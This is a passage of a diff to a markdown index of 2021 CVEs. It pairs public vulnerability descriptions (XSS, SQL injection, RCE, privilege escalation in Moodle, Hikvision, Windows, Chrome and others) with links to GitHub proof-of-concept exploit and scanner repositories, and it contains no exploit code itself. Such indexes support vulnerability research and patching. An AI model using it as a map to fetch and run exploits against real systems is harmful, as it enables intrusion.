+- [Y4er/openam-CVE-2021-35464](https://github.com/Y4er/openam-CVE-2021-35464)
+- [rood8008/CVE-2021-35464](https://github.com/rood8008/CVE-2021-35464)
+
+### CVE-2021-35475 (2021-06-25)
+
+SAS Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties.
+
+
+- [saitamang/CVE-2021-35475](https://github.com/saitamang/CVE-2021-35475)
+
+### CVE-2021-35492 (2021-10-05)
+
+Wowza Streaming Engine through 4.8.11+5 could allow an authenticated, remote attacker to exhaust filesystem resources via the /enginemanager/server/vhost/historical.jsdata vhost parameter. This is due to the insufficient management of available filesystem resources. An attacker could exploit this vulnerability through the Virtual Host Monitoring section by requesting random virtual-host historical data and exhausting available filesystem resources. A successful exploit could allow the attacker to cause database errors and cause the device to become unresponsive to web-based management. (Manual intervention is required to free filesystem resources and return the application to an operational state.)
+
+
+- [N4nj0/CVE-2021-35492](https://github.com/N4nj0/CVE-2021-35492)
+
+### CVE-2021-35576 (2021-10-20)
+
+Vulnerability in the Oracle Database Enterprise Edition Unified Audit component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1 and 19c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with network access via Oracle Net to compromise Oracle Database Enterprise Edition Unified Audit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database Enterprise Edition Unified Audit accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).
+
+
+- [emad-almousa/CVE-2021-35576](https://github.com/emad-almousa/CVE-2021-35576)
+
+### CVE-2021-35587 (2022-01-19)
+
+Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [antx-code/CVE-2021-35587](https://github.com/antx-code/CVE-2021-35587)
+
+### CVE-2021-35616 (2021-10-20)
+
+Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: UI Infrastructure). The supported version that is affected is 6.4.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Transportation Management accessible data as well as unauthorized read access to a subset of Oracle Transportation Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).
+
+
+- [Ofirhamam/OracleOTM](https://github.com/Ofirhamam/OracleOTM)
+
+### CVE-2021-35956 (2021-06-30)
+
+Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
+
+
+- [tcbutler320/CVE-2021-35956](https://github.com/tcbutler320/CVE-2021-35956)
+
+### CVE-2021-35958 (2021-06-30)
+
+TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives
+
+
+- [miguelc49/CVE-2021-35958-2](https://github.com/miguelc49/CVE-2021-35958-2)
+- [miguelc49/CVE-2021-35958-1](https://github.com/miguelc49/CVE-2021-35958-1)
+
+### CVE-2021-35975 (2023-11-30)
+
+Absolute path traversal vulnerability in the Systematica SMTP Adapter component (up to v2.0.1.101) in Systematica Radius (up to v.3.9.256.777) allows remote attackers to read arbitrary files via a full pathname in GET parameter "file" in URL. Also: affected components in same product - HTTP Adapter (up to v.1.8.0.15), MSSQL MessageBus Proxy (up to v.1.1.06), Financial Calculator (up to v.1.3.05), FIX Adapter (up to v.2.4.0.25)
+
+
+- [fbkcs/CVE-2021-35975](https://github.com/fbkcs/CVE-2021-35975)
+
+### CVE-2021-36260 (2021-09-22)
+
+A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
+
+
+- [rabbitsafe/CVE-2021-36260](https://github.com/rabbitsafe/CVE-2021-36260)
+- [Aiminsun/CVE-2021-36260](https://github.com/Aiminsun/CVE-2021-36260)
+- [TaroballzChen/CVE-2021-36260-metasploit](https://github.com/TaroballzChen/CVE-2021-36260-metasploit)
+- [tuntin9x/CheckHKRCE](https://github.com/tuntin9x/CheckHKRCE)
+- [Cuerz/CVE-2021-36260](https://github.com/Cuerz/CVE-2021-36260)
+- [TakenoSite/Simple-CVE-2021-36260](https://github.com/TakenoSite/Simple-CVE-2021-36260)
+- [r3t4k3r/hikvision_brute](https://github.com/r3t4k3r/hikvision_brute)
+- [haingn/HIK-CVE-2021-36260-Exploit](https://github.com/haingn/HIK-CVE-2021-36260-Exploit)
+
+### CVE-2021-36393 (2023-03-06)
+
+In Moodle, an SQL injection risk was identified in the library fetching a user's recent courses.
+
+
+- [StackOverflowExcept1on/CVE-2021-36393](https://github.com/StackOverflowExcept1on/CVE-2021-36393)
+- [T0X1Cx/CVE-2021-36393-Exploit](https://github.com/T0X1Cx/CVE-2021-36393-Exploit)
+
+### CVE-2021-36394 (2023-03-06)
+
+In Moodle, a remote code execution risk was identified in the Shibboleth authentication plugin.
+
+
+- [dinhbaouit/CVE-2021-36394](https://github.com/dinhbaouit/CVE-2021-36394)
+- [lavclash75/CVE-2021-36394-Pre-Auth-RCE-in-Moodle](https://github.com/lavclash75/CVE-2021-36394-Pre-Auth-RCE-in-Moodle)
+
+### CVE-2021-36460 (2022-04-25)
+
+VeryFitPro (com.veryfit2hr.second) 3.2.8 hashes the account's password locally on the device and uses the hash to authenticate in all communication with the backend API, including login, registration and changing of passwords. This allows an attacker in possession of a hash to takeover a user's account, rendering the benefits of storing hashed passwords in the database useless.
+
+
+- [martinfrancois/CVE-2021-36460](https://github.com/martinfrancois/CVE-2021-36460)
+
+### CVE-2021-36563 (2021-07-26)
+
+The CheckMK management web console (versions 1.5.0 to 2.0.0) does not sanitise user input in various parameters of the WATO module. This allows an attacker to open a backdoor on the device with HTML content and interpreted by the browser (such as JavaScript or other client-side scripts), the XSS payload will be triggered when the user accesses some specific sections of the application. In the same sense a very dangerous potential way would be when an attacker who has the monitor role (not administrator) manages to get a stored XSS to steal the secretAutomation (for the use of the API in administrator mode) and thus be able to create another administrator user who has high privileges on the CheckMK monitoring web console. Another way is that persistent XSS allows an attacker to modify the displayed content or change the victim's information. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session.
+
+
+- [Edgarloyola/CVE-2021-36563](https://github.com/Edgarloyola/CVE-2021-36563)
+
+### CVE-2021-36593
+- [mir-hossein/Statement](https://github.com/mir-hossein/Statement)
+
+### CVE-2021-36630 (2023-01-18)
+
+DDOS reflection amplification vulnerability in eAut module of Ruckus Wireless SmartZone controller that allows remote attackers to perform DOS attacks via crafted request.
+
+
+- [lixiang957/CVE-2021-36630](https://github.com/lixiang957/CVE-2021-36630)
+
+### CVE-2021-36747 (2021-07-20)
+
+Blackboard Learn through 9.1 allows XSS by an authenticated user via the Feedback to Learner form.
+
+
+- [cseasholtz/CVE-2021-36747](https://github.com/cseasholtz/CVE-2021-36747)
+
+### CVE-2021-36749 (2021-09-24)
+
+In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
+
+
+- [sma11new/PocList](https://github.com/sma11new/PocList)
+- [BrucessKING/CVE-2021-36749](https://github.com/BrucessKING/CVE-2021-36749)
+- [dorkerdevil/CVE-2021-36749](https://github.com/dorkerdevil/CVE-2021-36749)
+- [zwlsix/apache_druid_CVE-2021-36749](https://github.com/zwlsix/apache_druid_CVE-2021-36749)
+- [Jun-5heng/CVE-2021-36749](https://github.com/Jun-5heng/CVE-2021-36749)
+
+### CVE-2021-36782 (2022-08-19)
+
+A Cleartext Storage of Sensitive Information vulnerability in SUSE Rancher allows authenticated Cluster Owners, Cluster Members, Project Owners, Project Members and User Base to use the Kubernetes API to retrieve plaintext version of sensitive data. This issue affects: SUSE Rancher Rancher versions prior to 2.5.16; Rancher versions prior to 2.6.7.
+
+
+- [fe-ax/tf-cve-2021-36782](https://github.com/fe-ax/tf-cve-2021-36782)
+
+### CVE-2021-36798 (2021-08-09)
+
+A Denial-of-Service (DoS) vulnerability was discovered in Team Server in HelpSystems Cobalt Strike 4.2 and 4.3. It allows remote attackers to crash the C2 server thread and block beacons' communication with it.
+
+
+- [M-Kings/CVE-2021-36798](https://github.com/M-Kings/CVE-2021-36798)
+- [JamVayne/CobaltStrikeDos](https://github.com/JamVayne/CobaltStrikeDos)
+- [sponkmonk/CobaltSploit](https://github.com/sponkmonk/CobaltSploit)
+
+### CVE-2021-36799 (2021-07-19)
+
+KNX ETS5 through 5.7.6 uses the hard-coded password ETS5Password, with a salt value of Ivan Medvedev, allowing local users to read project information. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
+
+
+- [robertguetzkow/ets5-password-recovery](https://github.com/robertguetzkow/ets5-password-recovery)
+
+### CVE-2021-36808 (2021-10-30)
+
+A local attacker could bypass the app password using a race condition in Sophos Secure Workspace for Android before version 9.7.3115.
+
+
+- [ctuIhu/CVE-2021-36808](https://github.com/ctuIhu/CVE-2021-36808)
+
+### CVE-2021-36934 (2021-07-22)
+
+<p>An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p>\n<p>An attacker must have the ability to execute code on a victim system to exploit this vulnerability.</p>\n<p>After installing this security update, you <em>must</em> manually delete all shadow copies of system files, including the SAM database, to fully mitigate this vulnerabilty. <strong>Simply installing this security update will not fully mitigate this vulnerability.</strong> See <a href="https://support.microsoft.com/topic/1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7">KB5005357- Delete Volume Shadow Copies</a>.</p>\n
+
+
+- [HuskyHacks/ShadowSteal](https://github.com/HuskyHacks/ShadowSteal)
+- [JoranSlingerland/CVE-2021-36934](https://github.com/JoranSlingerland/CVE-2021-36934)
+- [n3tsurge/CVE-2021-36934](https://github.com/n3tsurge/CVE-2021-36934)
+- [Wh04m1001/VSSCopy](https://github.com/Wh04m1001/VSSCopy)
+- [WiredPulse/Invoke-HiveNightmare](https://github.com/WiredPulse/Invoke-HiveNightmare)
+- [romarroca/SeriousSam](https://github.com/romarroca/SeriousSam)
+- [WiredPulse/Invoke-HiveDreams](https://github.com/WiredPulse/Invoke-HiveDreams)
+- [tda90/CVE-2021-36934](https://github.com/tda90/CVE-2021-36934)
+- [VertigoRay/CVE-2021-36934](https://github.com/VertigoRay/CVE-2021-36934)
+- [bytesizedalex/CVE-2021-36934](https://github.com/bytesizedalex/CVE-2021-36934)
+- [Preventions/CVE-2021-36934](https://github.com/Preventions/CVE-2021-36934)
+- [Sp00p64/PyNightmare](https://github.com/Sp00p64/PyNightmare)
+- [jmaddington/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM](https://github.com/jmaddington/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM)
+- [0x0D1n/CVE-2021-36934](https://github.com/0x0D1n/CVE-2021-36934)
+- [exploitblizzard/CVE-2021-36934](https://github.com/exploitblizzard/CVE-2021-36934)
+- [irissentinel/CVE-2021-36934](https://github.com/irissentinel/CVE-2021-36934)
+- [websecnl/CVE-2021-36934](https://github.com/websecnl/CVE-2021-36934)
+- [grishinpv/poc_CVE-2021-36934](https://github.com/grishinpv/poc_CVE-2021-36934)
+- [shaktavist/SeriousSam](https://github.com/shaktavist/SeriousSam)
+- [OlivierLaflamme/CVE-2021-36934-export-shadow-volume-POC](https://github.com/OlivierLaflamme/CVE-2021-36934-export-shadow-volume-POC)
+- [chron1k/oxide_hive](https://github.com/chron1k/oxide_hive)
+
+### CVE-2021-36949 (2021-08-12)
+
+Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability
+
+
+- [Maxwitat/Check-AAD-Connect-for-CVE-2021-36949-vulnerability](https://github.com/Maxwitat/Check-AAD-Connect-for-CVE-2021-36949-vulnerability)
+
+### CVE-2021-36955 (2021-09-15)
+
+Windows Common Log File System Driver Elevation of Privilege Vulnerability
+
+
+- [JiaJinRong12138/CVE-2021-36955-EXP](https://github.com/JiaJinRong12138/CVE-2021-36955-EXP)
+
+### CVE-2021-36981 (2021-08-31)
+
+In the server in SerNet verinice before 1.22.2, insecure Java deserialization allows remote authenticated attackers to execute arbitrary code.
+
+
+- [0xBrAinsTorM/CVE-2021-36981](https://github.com/0xBrAinsTorM/CVE-2021-36981)
+
+### CVE-2021-37152 (2021-08-10)
+
+Multiple XSS issues exist in Sonatype Nexus Repository Manager 3 before 3.33.0. An authenticated attacker with the ability to add HTML files to a repository could redirect users to Nexus Repository Manager’s pages with code modifications.
+
+
+- [SecurityAnalysts/CVE-2021-37152](https://github.com/SecurityAnalysts/CVE-2021-37152)
+
+### CVE-2021-37580 (2021-11-16)
+
+A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0
+
+
+- [rabbitsafe/CVE-2021-37580](https://github.com/rabbitsafe/CVE-2021-37580)
+- [fengwenhua/CVE-2021-37580](https://github.com/fengwenhua/CVE-2021-37580)
+- [Osyanina/westone-CVE-2021-37580-scanner](https://github.com/Osyanina/westone-CVE-2021-37580-scanner)
+- [ZororoZ/CVE-2021-37580](https://github.com/ZororoZ/CVE-2021-37580)
+- [Liang2580/CVE-2021-37580](https://github.com/Liang2580/CVE-2021-37580)
+- [Wing-song/CVE-2021-37580](https://github.com/Wing-song/CVE-2021-37580)
+- [CN016/Apache-ShenYu-Admin-JWT-CVE-2021-37580-](https://github.com/CN016/Apache-ShenYu-Admin-JWT-CVE-2021-37580-)
+
+### CVE-2021-37624 (2021-10-25)
+
+FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.
+
+
+- [0xInfection/PewSWITCH](https://github.com/0xInfection/PewSWITCH)
+
+### CVE-2021-37678 (2021-08-12)
+
+TensorFlow is an end-to-end open source platform for machine learning. In affected versions TensorFlow and Keras can be tricked to perform arbitrary code execution when deserializing a Keras model from YAML format. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/python/keras/saving/model_config.py#L66-L104) uses `yaml.unsafe_load` which can perform arbitrary code execution on the input. Given that YAML format support requires a significant amount of work, we have removed it for now. We have patched the issue in GitHub commit 23d6383eb6c14084a8fc3bdf164043b974818012. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
+
+
+- [fran-CICS/ExploitTensorflowCVE-2021-37678](https://github.com/fran-CICS/ExploitTensorflowCVE-2021-37678)
+
+### CVE-2021-37740 (2022-04-20)
+
+A denial of service vulnerability exists in MDT's firmware for the KNXnet/IP Secure router SCN-IP100.03 and KNX IP interface SCN-IP000.03 before v3.0.4, that allows a remote attacker to turn the device unresponsive to all requests on the KNXnet/IP Secure layer, until the device is rebooted, via a SESSION_REQUEST frame with a modified total length field.
+
+
+- [robertguetzkow/CVE-2021-37740](https://github.com/robertguetzkow/CVE-2021-37740)
+
+### CVE-2021-37748 (2021-10-28)
+
+Multiple buffer overflows in the limited configuration shell (/sbin/gs_config) on Grandstream HT801 devices before 1.0.29 allow remote authenticated users to execute arbitrary code as root via a crafted manage_if setting, thus bypassing the intended restrictions of this shell and taking full control of the device. There are default weak credentials that can be used to authenticate.
+
+
+- [SECFORCE/CVE-2021-37748](https://github.com/SECFORCE/CVE-2021-37748)
+
+### CVE-2021-37832 (2021-08-03)
+
+A SQL injection vulnerability exists in version 3.0.2 of Hotel Druid when SQLite is being used as the application database. A malicious attacker can issue SQL commands to the SQLite database through the vulnerable idappartamenti parameter.
+
+
+- [dievus/CVE-2021-37832](https://github.com/dievus/CVE-2021-37832)
+- [AK-blank/CVE-2021-37832](https://github.com/AK-blank/CVE-2021-37832)
+
+### CVE-2021-37833 (2021-08-03)
+
+A reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands.
+
+
+- [dievus/CVE-2021-37833](https://github.com/dievus/CVE-2021-37833)
+
+### CVE-2021-37910 (2021-11-12)
+
+ASUS routers Wi-Fi protected access protocol (WPA2 and WPA3-SAE) has improper control of Interaction frequency vulnerability, an unauthenticated attacker can remotely disconnect other users' connections by sending specially crafted SAE authentication frames.
+
+
+- [efchatz/easy-exploits](https://github.com/efchatz/easy-exploits)
+
+### CVE-2021-37975 (2021-10-08)
+
+Use after free in V8 in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+
+
+- [ssaroussi/CVE-2021-37975](https://github.com/ssaroussi/CVE-2021-37975)
+
+### CVE-2021-37980 (2021-11-02)
+
+Inappropriate implementation in Sandbox in Google Chrome prior to 94.0.4606.81 allowed a remote attacker to potentially bypass site isolation via Windows.
+
+
+- [ZeusBox/CVE-2021-37980](https://github.com/ZeusBox/CVE-2021-37980)
+
+### CVE-2021-38001 (2021-11-23)
+
+Type confusion in V8 in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+
+
+- [maldiohead/TFC-Chrome-v8-bug-CVE-2021-38001-poc](https://github.com/maldiohead/TFC-Chrome-v8-bug-CVE-2021-38001-poc)
+- [Peterpan0927/TFC-Chrome-v8-bug-CVE-2021-38001-poc](https://github.com/Peterpan0927/TFC-Chrome-v8-bug-CVE-2021-38001-poc)
+- [TheHermione/CVE-2021-38001](https://github.com/TheHermione/CVE-2021-38001)
+
+### CVE-2021-38003 (2021-11-23)
+
+Inappropriate implementation in V8 in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+
+
+- [SpiralBL0CK/Chrome-V8-RCE-CVE-2021-38003](https://github.com/SpiralBL0CK/Chrome-V8-RCE-CVE-2021-38003)
+
+### CVE-2021-38149 (2021-08-06)
+
+index.php/admin/add_user in Chikitsa Patient Management System 2.0.0 allows XSS.
+
+
+- [jboogie15/CVE-2021-38149](https://github.com/jboogie15/CVE-2021-38149)
+
+### CVE-2021-38163 (2021-09-14)
+
+SAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable.\n\n
+
+
+- [core1impact/CVE-2021-38163](https://github.com/core1impact/CVE-2021-38163)
+
+### CVE-2021-38185 (2021-08-07)
+
+GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers an out-of-bounds heap write. NOTE: it is unclear whether there are common cases where the pattern file, associated with the -E option, is untrusted data.
+
+
+- [fangqyi/cpiopwn](https://github.com/fangqyi/cpiopwn)
+
+### CVE-2021-38295 (2021-10-14)
+
+In Apache CouchDB, a malicious user with permission to create documents in a database is able to attach a HTML attachment to a document. If a CouchDB admin opens that attachment in a browser, e.g. via the CouchDB admin interface Fauxton, any JavaScript code embedded in that HTML attachment will be executed within the security context of that admin. A similar route is available with the already deprecated _show and _list functionality. This privilege escalation vulnerability allows an attacker to add or remove data in any database or make configuration changes. This issue affected Apache CouchDB prior to 3.1.2
+
+
+- [ProfessionallyEvil/CVE-2021-38295-PoC](https://github.com/ProfessionallyEvil/CVE-2021-38295-PoC)
+
+### CVE-2021-38297 (2021-10-18)
+
+Go before 1.16.9 and 1.17.x before 1.17.2 has a Buffer Overflow via large arguments in a function invocation from a WASM module, when GOARCH=wasm GOOS=js is used.
+
+
+- [gkrishnan724/CVE-2021-38297](https://github.com/gkrishnan724/CVE-2021-38297)
+- [paras98/CVE-2021-38297-Go-wasm-Replication](https://github.com/paras98/CVE-2021-38297-Go-wasm-Replication)
+
+### CVE-2021-38314 (2021-09-01)
+
+The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`.
+
+
+- [orangmuda/CVE-2021-38314](https://github.com/orangmuda/CVE-2021-38314)
+- [phrantom/cve-2021-38314](https://github.com/phrantom/cve-2021-38314)
+- [shubhayu-64/CVE-2021-38314](https://github.com/shubhayu-64/CVE-2021-38314)
+- [twseptian/cve-2021-38314](https://github.com/twseptian/cve-2021-38314)
+- [c0ff33b34n/CVE-2021-38314](https://github.com/c0ff33b34n/CVE-2021-38314)
+- [akhilkoradiya/CVE-2021-38314](https://github.com/akhilkoradiya/CVE-2021-38314)
+- [0xGabe/CVE-2021-38314](https://github.com/0xGabe/CVE-2021-38314)
+
+### CVE-2021-38540 (2021-09-09)
+
+The variable import endpoint was not protected by authentication in Airflow >=2.0.0, <2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow >=2.0.0, <2.1.3.
+
+
+- [Captain-v-hook/PoC-for-CVE-2021-38540-](https://github.com/Captain-v-hook/PoC-for-CVE-2021-38540-)
+
+### CVE-2021-38560 (2022-02-01)
+
+Ivanti Service Manager 2021.1 allows reflected XSS via the appName parameter associated with ConfigDB calls, such as in RelocateAttachments.aspx.
+
+
+- [os909/iVANTI-CVE-2021-38560](https://github.com/os909/iVANTI-CVE-2021-38560)
+
+### CVE-2021-38583 (2021-08-13)
+
+openBaraza HCM 3.1.6 does not properly neutralize user-controllable input, which allows reflected cross-site scripting (XSS) on multiple pages: hr/subscription.jsp and hr/application.jsp and and hr/index.jsp (with view= and data=).
+
+
+- [charlesbickel/CVE-2021-38583](https://github.com/charlesbickel/CVE-2021-38583)
+
+### CVE-2021-38601
+- [5l1v3r1/CVE-2021-38601](https://github.com/5l1v3r1/CVE-2021-38601)
+
+### CVE-2021-38602 (2021-08-12)
+
+PluXML 5.8.7 allows Article Editing stored XSS via Headline or Content.
+
+
+- [KielVaughn/CVE-2021-38602](https://github.com/KielVaughn/CVE-2021-38602)
+
+### CVE-2021-38603 (2021-08-12)
+
+PluXML 5.8.7 allows core/admin/profil.php stored XSS via the Information field.
+
+
+- [KielVaughn/CVE-2021-38603](https://github.com/KielVaughn/CVE-2021-38603)
+
+### CVE-2021-38619 (2021-08-13)
+
+openBaraza HCM 3.1.6 does not properly neutralize user-controllable input: an unauthenticated remote attacker can conduct a stored cross-site scripting (XSS) attack against an administrative user from hr/subscription.jsp and hr/application.jsp and and hr/index.jsp (with view=).
+
+
+- [charlesbickel/CVE-2021-38619](https://github.com/charlesbickel/CVE-2021-38619)
+
+### CVE-2021-38639 (2021-09-15)
+
+Win32k Elevation of Privilege Vulnerability
+
+
+- [DarkSprings/CVE-2021-38639](https://github.com/DarkSprings/CVE-2021-38639)
+
+### CVE-2021-38647 (2021-09-15)
+
+Open Management Infrastructure Remote Code Execution Vulnerability
+
+
+- [corelight/CVE-2021-38647](https://github.com/corelight/CVE-2021-38647)
+- [midoxnet/CVE-2021-38647](https://github.com/midoxnet/CVE-2021-38647)
+- [horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647)
+- [Immersive-Labs-Sec/cve-2021-38647](https://github.com/Immersive-Labs-Sec/cve-2021-38647)
+- [marcosimioni/omigood](https://github.com/marcosimioni/omigood)
+- [craig-m-unsw/omigod-lab](https://github.com/craig-m-unsw/omigod-lab)
+- [SimenBai/CVE-2021-38647-POC-and-Demo-environment](https://github.com/SimenBai/CVE-2021-38647-POC-and-Demo-environment)
+- [AlteredSecurity/CVE-2021-38647](https://github.com/AlteredSecurity/CVE-2021-38647)
+- [m1thryn/CVE-2021-38647](https://github.com/m1thryn/CVE-2021-38647)
+- [abousteif/cve-2021-38647](https://github.com/abousteif/cve-2021-38647)
+- [Vulnmachines/OMIGOD_cve-2021-38647](https://github.com/Vulnmachines/OMIGOD_cve-2021-38647)
+- [goofsec/omigod](https://github.com/goofsec/omigod)
+- [corelight/CVE-2021-38647-noimages](https://github.com/corelight/CVE-2021-38647-noimages)
+
+### CVE-2021-38666 (2021-11-10)
+
+Remote Desktop Client Remote Code Execution Vulnerability
+
+
+- [DarkSprings/CVE-2021-38666-poc](https://github.com/DarkSprings/CVE-2021-38666-poc)
+- [JaneMandy/CVE-2021-38666](https://github.com/JaneMandy/CVE-2021-38666)
+
+### CVE-2021-38699 (2021-08-15)
+
+TastyIgniter 3.0.7 allows XSS via /account, /reservation, /admin/dashboard, and /admin/system_logs.
+
+
+- [HuskyHacks/CVE-2021-38699-Reflected-XSS](https://github.com/HuskyHacks/CVE-2021-38699-Reflected-XSS)
+- [HuskyHacks/CVE-2021-38699-Stored-XSS](https://github.com/HuskyHacks/CVE-2021-38699-Stored-XSS)
+- [Justin-1993/CVE-2021-38699](https://github.com/Justin-1993/CVE-2021-38699)
+
+### CVE-2021-38817
+- [HuskyHacks/CVE-2021-38817-Remote-OS-Command-Injection](https://github.com/HuskyHacks/CVE-2021-38817-Remote-OS-Command-Injection)
+
+### CVE-2021-38819 (2022-11-16)
+
+A SQL injection vulnerability exits on the Simple Image Gallery System 1.0 application through "id" parameter on the album page.
+
+
+- [m4sk0ff/CVE-2021-38819](https://github.com/m4sk0ff/CVE-2021-38819)
+
+### CVE-2021-39115 (2021-08-30)
+
+Affected versions of Atlassian Jira Service Management Server and Data Center allow remote attackers with "Jira Administrators" access to execute arbitrary Java code or run arbitrary system commands via a Server_Side Template Injection vulnerability in the Email Template feature. The affected versions are before version 4.13.9, and from version 4.14.0 before 4.18.0.
+
+
+- [PetrusViet/CVE-2021-39115](https://github.com/PetrusViet/CVE-2021-39115)
+
+### CVE-2021-39141 (2021-08-23)
+
+XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
+
+
+- [zwjjustdoit/Xstream-1.4.17](https://github.com/zwjjustdoit/Xstream-1.4.17)
+
+### CVE-2021-39165 (2021-08-26)
+
+Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet <https://github.com/CachetHQ/Cachet> is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.
+
+
+- [W0rty/CVE-2021-39165](https://github.com/W0rty/CVE-2021-39165)
+- [manbolq/CVE-2021-39165](https://github.com/manbolq/CVE-2021-39165)
+
+### CVE-2021-39172 (2021-08-27)
+
+Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can exploit a new line injection in the configuration edition feature (e.g. mail settings) and gain arbitrary code execution on the server. This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of new lines characters in new configuration values. As a workaround, only allow trusted source IP addresses to access to the administration dashboard.
+
+
+- [W1ngLess/CVE-2021-39172-RCE](https://github.com/W1ngLess/CVE-2021-39172-RCE)
+
+### CVE-2021-39174 (2021-08-27)
+
